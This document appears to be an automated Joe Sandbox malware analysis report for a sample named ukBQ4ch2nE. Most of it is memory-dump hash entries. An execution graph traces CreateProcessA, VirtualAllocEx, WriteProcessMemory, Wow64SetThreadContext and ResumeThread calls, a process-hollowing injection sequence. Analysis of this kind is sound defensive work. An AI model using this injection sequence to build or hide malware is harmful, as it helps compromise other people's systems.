                                                        • Instruction Fuzzy Hash: 7A419230E106168BDB60DFA9D58469EF7B2EF89310F108929E806DF354EB74A845CB41
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c45034dd51ae8eab2ab8b3468f1d69100a905533f5a2f030b4cc720e22cc3782
                                                        • Instruction ID: 4a26d6e7c40c650ca7befa3bb778b8a43469aff29df04448012d7facf21da753
                                                        • Opcode Fuzzy Hash: c45034dd51ae8eab2ab8b3468f1d69100a905533f5a2f030b4cc720e22cc3782
                                                        • Instruction Fuzzy Hash: 2C317E35E102158BCB45CFA4DAA569EB7F6FF89300F14C529E906EB354DB71AD42CB40
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e3b5a38b6f4007784fb74856601261b0d763edc0292106e0e26849013d347ca
                                                        • Instruction ID: 87971c9ef66042c21883b882f773f9688bfa7996b63563e15ba6bd6b12c7e8b0
                                                        • Opcode Fuzzy Hash: 0e3b5a38b6f4007784fb74856601261b0d763edc0292106e0e26849013d347ca
                                                        • Instruction Fuzzy Hash: C7318F34E102159BCB04CFA4DAA469EB7F6FF89300F508529E906EB354EB71ED42CB80
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cac71c64b68b996d93f016c75357df47d1ed78d2be4ab551195fcbd12cb59001
                                                        • Instruction ID: e33af112a67f81e7c1b80a989a017cb3251c737ec7e8a6e2f9de4c8ddae9781e
                                                        • Opcode Fuzzy Hash: cac71c64b68b996d93f016c75357df47d1ed78d2be4ab551195fcbd12cb59001
                                                        • Instruction Fuzzy Hash: BD216D75F006259FDB50DFA9D990AAEBBF1EB88350F108069E945EB354EB30D941CB90
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aa5327e2d1a6e7e494b3746635af55bb4087128def040bab56138c10de73104a
                                                        • Instruction ID: 18bd997b44a0085b736c4f9a89f7faf6ab1775acfc7a5e384783bd6a57a043f0
                                                        • Opcode Fuzzy Hash: aa5327e2d1a6e7e494b3746635af55bb4087128def040bab56138c10de73104a
                                                        • Instruction Fuzzy Hash: E9219D75F006259FDB40DF69D990AAEBBF1EB88750F108069E906EB394EB30D941CB90
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 787a6b0b5114ce373f6e09b5f079bd187f3b1a0d6a3592740e0e0ca126d032b2
                                                        • Instruction ID: d51194de83e2344f20f1f393af67ec5d0f62e5e0409f3e7b7249b8ddb57b0641
                                                        • Opcode Fuzzy Hash: 787a6b0b5114ce373f6e09b5f079bd187f3b1a0d6a3592740e0e0ca126d032b2
                                                        • Instruction Fuzzy Hash: F72122B1604200DFCB10DF14D9D0B26BBE5FB88314F24CAADE9094B392C33AD907DA62
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8e4c34c028640ec089b0b8a10a27ae9d3f2c9cbaa4079f8c780120dd7da9893
                                                        • Instruction ID: 683c87f90b5b1fe0bcca36ac0fe8d449def606e79bc97cfb072a7d7dbfe894bb
                                                        • Opcode Fuzzy Hash: d8e4c34c028640ec089b0b8a10a27ae9d3f2c9cbaa4079f8c780120dd7da9893
                                                        • Instruction Fuzzy Hash: E42101B1604240DFDB04DF14C9C0B26BBE6FB88718F24C6ADEC095B292C33AD946D661
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4acc730d49d598cef3c8d87e24f04364e45b53d670b7e78ea10301db20a618a4
                                                        • Instruction ID: d77561a8bc10b9669c72e553b0f40cd6dd20fb9a93bf60fee61e6000fa642dcf
                                                        • Opcode Fuzzy Hash: 4acc730d49d598cef3c8d87e24f04364e45b53d670b7e78ea10301db20a618a4
                                                        • Instruction Fuzzy Hash: 61217230F10129ABDF44EBA9E96469EB7B7EF84310F14842AD405DB394EB31ED418B84
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48f754bcd24036e18c4cc2202e0f8b72339219a38fd062011e58c55e3aa784c5
                                                        • Instruction ID: 313cedfc30caba06c21a1f95185e70265a91f28ee896d60efdfe2333a43a3564
                                                        • Opcode Fuzzy Hash: 48f754bcd24036e18c4cc2202e0f8b72339219a38fd062011e58c55e3aa784c5
                                                        • Instruction Fuzzy Hash: B111A771D207594BDF60CEA9C8842DFFBB5EF86310F104527E905EB300D77194958752
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e223a52a605d03a915ae4bc4b901d10027f6fbd4be4ec8b66a9d61d740c5b965
                                                        • Instruction ID: a01a5f62aac63a65a3927d252bec54cce95d3fb24ba14b1dc5816a700ebab662
                                                        • Opcode Fuzzy Hash: e223a52a605d03a915ae4bc4b901d10027f6fbd4be4ec8b66a9d61d740c5b965
                                                        • Instruction Fuzzy Hash: CF11A132F105354FCF54AA79D8146AE73EBEBC9610B004439D506E7358EE65DC028BD5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99803484224b0b9ee94c7d337985e2284464d73119390c796bf5522f7cc0a23a
                                                        • Instruction ID: 48033889e92e333b404ebdc950bd37cd20aed7cfcadd6f4846c96cdc5ebc6a7f
                                                        • Opcode Fuzzy Hash: 99803484224b0b9ee94c7d337985e2284464d73119390c796bf5522f7cc0a23a
                                                        • Instruction Fuzzy Hash: 8A01B139B142A20FDB559679D4A172EBBD6DBC9720F11847FE40ACB391EA24DC024396
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9ecf68f556a29967ead6e7258b0f44edbddb6900443da98f49a07e1ca0f3738
                                                        • Instruction ID: 0bc8ff7d877dd3cdc7f3dd0ba22c1e4325f5dc9129cb556a48fddd0633f8b002
                                                        • Opcode Fuzzy Hash: f9ecf68f556a29967ead6e7258b0f44edbddb6900443da98f49a07e1ca0f3738
                                                        • Instruction Fuzzy Hash: CC012B357042610BCB659A7DD89472FBBD6DBC9720F14843BF40ACB342DD26DC428396
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                        • Instruction ID: a3d128cf6429e1d9ed95a2f1b840f6d51d34dedab522078283683415f990ad24
                                                        • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                        • Instruction Fuzzy Hash: 7511BB75504280DFDB12CF14D5D0B15BBA1FB84314F28C6AED8494B756C33AD84ACB62
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1dd4e15b6c47573078d5919fbe59200c1e6d0d4062bdd2984d1d9dfc811f8282
                                                        • Instruction ID: f04f93dcca3663430a61c0206daec1b209231744b88e284b8a202d9b2b0c08bf
                                                        • Opcode Fuzzy Hash: 1dd4e15b6c47573078d5919fbe59200c1e6d0d4062bdd2984d1d9dfc811f8282
                                                        • Instruction Fuzzy Hash: 7C014731B042200FDB659A78E850B5F7BE5DBC5710F14852EF00ACB394EA61DC42C781
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034263260.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b4d000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4e08d273bc19f3b3ab6564e8c8f805518653f541784c48cdb785afd743e373b6
                                                        • Instruction ID: 47739f6c644ba446bbb649275bcc143c0e451195d250ad6b5b0df1ba36ea185a
                                                        • Opcode Fuzzy Hash: 4e08d273bc19f3b3ab6564e8c8f805518653f541784c48cdb785afd743e373b6
                                                        • Instruction Fuzzy Hash: 8211B875504280CFDB06CF10C9C0B15BFA2FB84318F24C6AEDC494B6A2C33AD94ACB92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2e5fb003de66af0fc9373d84acce0b87903425e184d1e186d7bb048b50aefcc2
                                                        • Instruction ID: fddce482b21de425acbbb590d05ad2a73a4651baea61a32bd7cceb8485dcacd1
                                                        • Opcode Fuzzy Hash: 2e5fb003de66af0fc9373d84acce0b87903425e184d1e186d7bb048b50aefcc2
                                                        • Instruction Fuzzy Hash: F801A236F101354FDF54A669ED246EF72EBDBC8210F00413AE506E7354EE248C0287D5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 097076136b93b208e285a36f2982ef7b3aaf2019cd35a9670ea52b520ea804ee
                                                        • Instruction ID: c35ba9ff9fd361e6b420c51bd722ac43c3b190c301343e98d6c4fbcad3e69b0a
                                                        • Opcode Fuzzy Hash: 097076136b93b208e285a36f2982ef7b3aaf2019cd35a9670ea52b520ea804ee
                                                        • Instruction Fuzzy Hash: 1121C3B5D00259DFDB10CF9AD984ADEFBF4FB48320F10862AE518A7340D7785544CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64ccfe7e51aa7ef533d1207a5af97fd63c34c6854780b2b26b29f3c6ad079fa9
                                                        • Instruction ID: fd01fa9aa74a78d2a8ef59f60dbfc0ce07303448bafe506996546de5a479e247
                                                        • Opcode Fuzzy Hash: 64ccfe7e51aa7ef533d1207a5af97fd63c34c6854780b2b26b29f3c6ad079fa9
                                                        • Instruction Fuzzy Hash: 2C11C2B5D00259DFCB10CF9AD884ADEFBF8FB48320F10812AE918A7340D3746544CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e76c8efef45507ba523cd0c7028f1fbc0c04e8d2f2fb2c9241615b63c7cfa514
                                                        • Instruction ID: 1d8627ae1f6d9eea7b675dbfaad32b4425e1e96636841c91bd7eaa5d1e54350e
                                                        • Opcode Fuzzy Hash: e76c8efef45507ba523cd0c7028f1fbc0c04e8d2f2fb2c9241615b63c7cfa514
                                                        • Instruction Fuzzy Hash: 0401F434B101A20BDB64957ED451B1FB6DACBC8B20F20883EF10ECB384ED25DC024386
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c3030900acdf5af390c4ac98f2598d20d621ec71034b3c4a2901187c5ca1fe9
                                                        • Instruction ID: 2de13ce566f7ee24d524b54e00fc43c24a8441e091348b33747067e6b996abb5
                                                        • Opcode Fuzzy Hash: 7c3030900acdf5af390c4ac98f2598d20d621ec71034b3c4a2901187c5ca1fe9
                                                        • Instruction Fuzzy Hash: F201A435B106210BCB64957ED49472FB7DADBC9720F10843AF50ACB351ED26DC024395
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5bd5d422c602ccbdafb7f0f432a7f87c48def5607cbdec53d17cea9f61dbf4f2
                                                        • Instruction ID: fc4055e45b25c19dae28adb232ff3822195e3533ca320d4f5bb7ec9da21899f3
                                                        • Opcode Fuzzy Hash: 5bd5d422c602ccbdafb7f0f432a7f87c48def5607cbdec53d17cea9f61dbf4f2
                                                        • Instruction Fuzzy Hash: 87018131B101250BDB649A69E450B1F77DAEBC9750F10852DF10ACB344EE61DC42CBC5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 001d2a608df15da460a89b87c1d7069faefe174a995581711d22fda74515a74a
                                                        • Instruction ID: d452acbfa38053e5e1d0f92b41d555773144558861661565639d01e73c39dbb2
                                                        • Opcode Fuzzy Hash: 001d2a608df15da460a89b87c1d7069faefe174a995581711d22fda74515a74a
                                                        • Instruction Fuzzy Hash: C4F0A032E20278ABDB54A976EC00A9AB77AE784754F004439FD01FB344EA71A901C7C0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d1d40d7654b9e0f39359457fa5136ad7c3057391b0982cf33f6c130d6ecb71a
                                                        • Instruction ID: dcd4353c8737b0012c3b93da46383308ddebc0fb13069350795150041a423035
                                                        • Opcode Fuzzy Hash: 1d1d40d7654b9e0f39359457fa5136ad7c3057391b0982cf33f6c130d6ecb71a
                                                        • Instruction Fuzzy Hash: 65E04F71E1426CABDF50CFB0CB4A35E77A9EB42204F3189BAD404DB242E237C9018780
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-2049195972
                                                        • Opcode ID: 35f791750e0387792dd0efc15650be469dc22101c7954c58ca7276fdb6f00a7d
                                                        • Instruction ID: 5a907c3b0bec281f184a21dd982104869df694ac39c657723aa72eeff4419eeb
                                                        • Opcode Fuzzy Hash: 35f791750e0387792dd0efc15650be469dc22101c7954c58ca7276fdb6f00a7d
                                                        • Instruction Fuzzy Hash: 69122D70E01229DFDB64DF65C994A9EBBF2BF89300F208569D40AAB365DB309D41CF85
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1110479544
                                                        • Opcode ID: 7451a8c5d0e31e01b53fc2abb1fb28a672ef3731a6554b415e52b4ba95088bb0
                                                        • Instruction ID: 3823433eeca1268f087546cc6a8fd363b726fcde6441b3b26c2641e22e314057
                                                        • Opcode Fuzzy Hash: 7451a8c5d0e31e01b53fc2abb1fb28a672ef3731a6554b415e52b4ba95088bb0
                                                        • Instruction Fuzzy Hash: AD915F30E10219DFEBA4EFA5D594B6E7BF2EF44300F108529E4419B394DB759842DB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .5}q$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1622854337
                                                        • Opcode ID: 0e6226d613c5792a6b4e58338ded34aaef03c18e0b9401b6790d5cdcee73a333
                                                        • Instruction ID: 1f3dc6efcc514832808bcd8fe03054d464e3c2c094b2ca312f8fe3ab58b16ba7
                                                        • Opcode Fuzzy Hash: 0e6226d613c5792a6b4e58338ded34aaef03c18e0b9401b6790d5cdcee73a333
                                                        • Instruction Fuzzy Hash: E3F16D70B11218CFDB54EFA5D594A6EBBF2FF88300F248568E4059B399DB35AC42CB84
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-220072568
                                                        • Opcode ID: cf6372178526839012ebdfabf7791800de20f0a2f7a825f2ccde4a9fefe38095
                                                        • Instruction ID: 1c00c848dfb3ad1dbd9087da51b38aa489bbe45d2ade513b3f1aaac6cc36470b
                                                        • Opcode Fuzzy Hash: cf6372178526839012ebdfabf7791800de20f0a2f7a825f2ccde4a9fefe38095
                                                        • Instruction Fuzzy Hash: 09718E30E102298FDBA8DFA9D98066EB7B2EF94300F24446AD406DF354EF719942CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: d1177903f12dda20c20ba8bd639931432c31938484d5204cee5da8ae6d7bf6a9
                                                        • Instruction ID: de7ff730bc4e1c91a87ee41f8897684e2e4e9b9c4becd07119a70c6680c03a94
                                                        • Opcode Fuzzy Hash: d1177903f12dda20c20ba8bd639931432c31938484d5204cee5da8ae6d7bf6a9
                                                        • Instruction Fuzzy Hash: 49B13A30A11219CFDB94EFA9D9946AEB7F2EF84300F24856DE4059B395DB75DC82CB80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LReq$LReq$$eq$$eq
                                                        • API String ID: 0-731573373
                                                        • Opcode ID: dcfe18139748ab1795783e1fa84baa8414c13da6cdad1cab09f9df91773678fa
                                                        • Instruction ID: 76e19962e3bc9705497887ab90775b32e220575fea0f80f69ad1508243d8cbbb
                                                        • Opcode Fuzzy Hash: dcfe18139748ab1795783e1fa84baa8414c13da6cdad1cab09f9df91773678fa
                                                        • Instruction Fuzzy Hash: 26517F30B002159FDB54EB29D990AAA77F6FF89700F14856DF4169F3A6EA30EC41CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: 143c138302ede57d517e8363bfce5b878ce0b05b8703d3bf9ddc6c30622ffda4
                                                        • Instruction ID: 674bb408b26a197d7c62c1d98ca17794ddad11f9e775c7d217ea96c926b9de6d
                                                        • Opcode Fuzzy Hash: 143c138302ede57d517e8363bfce5b878ce0b05b8703d3bf9ddc6c30622ffda4
                                                        • Instruction Fuzzy Hash: E951B031E202158FCF65DFA4D6906AEB7F2EB85310F14856AE486EB394DB31DC42DB81

                                                        Execution Graph

                                                        Execution Coverage:10%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:209
                                                        Total number of Limit Nodes:16
                                                        execution_graph 27957 5596dd8 27958 5596df2 27957->27958 27959 5596e1b 27958->27959 27962 5596e70 27958->27962 27967 5596e60 27958->27967 27963 5596e7c 27962->27963 27972 5596e91 27963->27972 27976 5596ea0 27963->27976 27964 5596e88 27964->27958 27968 5596e70 27967->27968 27970 5596e91 12 API calls 27968->27970 27971 5596ea0 12 API calls 27968->27971 27969 5596e88 27969->27958 27970->27969 27971->27969 27974 5596ea0 27972->27974 27973 5596f28 27973->27964 27974->27973 27980 5595a38 27974->27980 27978 5596ebc 27976->27978 27977 5596f28 27977->27964 27978->27977 27979 5595a38 12 API calls 27978->27979 27979->27978 27982 5595a43 27980->27982 27981 5597222 27981->27974 27982->27981 27995 5599bf8 27982->27995 28000 55999d9 27982->28000 28005 559a4a0 27982->28005 28010 5599a80 27982->28010 28014 559a34e 27982->28014 28019 559a1af 27982->28019 28023 559a28b 27982->28023 28029 559a2eb 27982->28029 28033 559a7ab 27982->28033 28038 559a1f1 27982->28038 28042 5599b1e 27982->28042 28047 559a3dd 27982->28047 27996 5599c68 27995->27996 27997 5599a49 27995->27997 28051 5599338 27996->28051 28055 5599330 27996->28055 27997->27982 28001 55999f5 28000->28001 28059 55995c0 28001->28059 28063 55995b4 28001->28063 28006 559a4a6 28005->28006 28007 5599a49 28006->28007 28008 5599338 WriteProcessMemory 28006->28008 28009 5599330 WriteProcessMemory 28006->28009 28008->28007 28009->28007 28067 559af58 28010->28067 28072 559af4a 28010->28072 28011 5599a49 28015 559a37a 28014->28015 28017 5599338 WriteProcessMemory 28015->28017 28018 5599330 WriteProcessMemory 28015->28018 28016 559a3b4 28017->28016 28018->28016 28085 559af10 28019->28085 28090 559af02 28019->28090 28020 559a1c7 28024 559a2fb 28023->28024 28026 5599a49 28023->28026 28025 559a30f 28024->28025 28027 5599338 WriteProcessMemory 28024->28027 28028 5599330 WriteProcessMemory 28024->28028 28025->27982 28027->28025 28028->28025 28031 5599338 WriteProcessMemory 28029->28031 28032 5599330 WriteProcessMemory 28029->28032 28030 559a30f 28030->27982 28031->28030 28032->28030 28035 5599b21 28033->28035 28034 5599a49 28035->28033 28035->28034 28104 559b648 28035->28104 28109 559b638 28035->28109 28122 559b5f0 28038->28122 28127 559b600 28038->28127 28039 559a209 28043 5599b21 28042->28043 28044 5599a49 28043->28044 28045 559b648 2 API calls 28043->28045 28046 559b638 2 API calls 28043->28046 28045->28043 28046->28043 28132 5599428 28047->28132 28136 5599422 28047->28136 28048 559a3ff 28052 5599380 WriteProcessMemory 28051->28052 28054 55993d7 28052->28054 28054->27997 28056 5599333 WriteProcessMemory 28055->28056 28058 55993d7 28056->28058 28058->27997 28060 5599649 CreateProcessA 28059->28060 28062 559980b 28060->28062 28062->28062 28064 55995c0 CreateProcessA 28063->28064 28066 559980b 28064->28066 28066->28066 28068 559af6d 28067->28068 28077 5599278 28068->28077 28081 5599270 28068->28081 28069 559af8c 28069->28011 28073 559af6d 28072->28073 28075 5599278 VirtualAllocEx 28073->28075 28076 5599270 VirtualAllocEx 28073->28076 28074 559af8c 28074->28011 28075->28074 28076->28074 28078 55992b8 VirtualAllocEx 28077->28078 28080 55992f5 28078->28080 28080->28069 28082 5599273 VirtualAllocEx 28081->28082 28084 55992f5 28082->28084 28084->28069 28086 559af25 28085->28086 28096 5599198 28086->28096 28100 55991a0 28086->28100 28087 559af3b 28087->28020 28091 559af0a 28090->28091 28092 559ae96 28090->28092 28094 5599198 Wow64SetThreadContext 28091->28094 28095 55991a0 Wow64SetThreadContext 28091->28095 28092->28020 28093 559af3b 28093->28020 28094->28093 28095->28093 28097 559919b Wow64SetThreadContext 28096->28097 28099 559922d 28097->28099 28099->28087 28101 55991e5 Wow64SetThreadContext 28100->28101 28103 559922d 28101->28103 28103->28087 28105 559b65d 28104->28105 28114 55990ea 28105->28114 28118 55990f0 28105->28118 28106 559b670 28106->28035 28110 559b645 28109->28110 28112 55990ea ResumeThread 28110->28112 28113 55990f0 ResumeThread 28110->28113 28111 559b670 28111->28035 28112->28111 28113->28111 28115 55990f0 ResumeThread 28114->28115 28117 5599161 28115->28117 28117->28106 28119 5599130 ResumeThread 28118->28119 28121 5599161 28119->28121 28121->28106 28123 559b615 28122->28123 28125 5599198 Wow64SetThreadContext 28123->28125 28126 55991a0 Wow64SetThreadContext 28123->28126 28124 559b62b 28124->28039 28125->28124 28126->28124 28128 559b615 28127->28128 28130 5599198 Wow64SetThreadContext 28128->28130 28131 55991a0 Wow64SetThreadContext 28128->28131 28129 559b62b 28129->28039 28130->28129 28131->28129 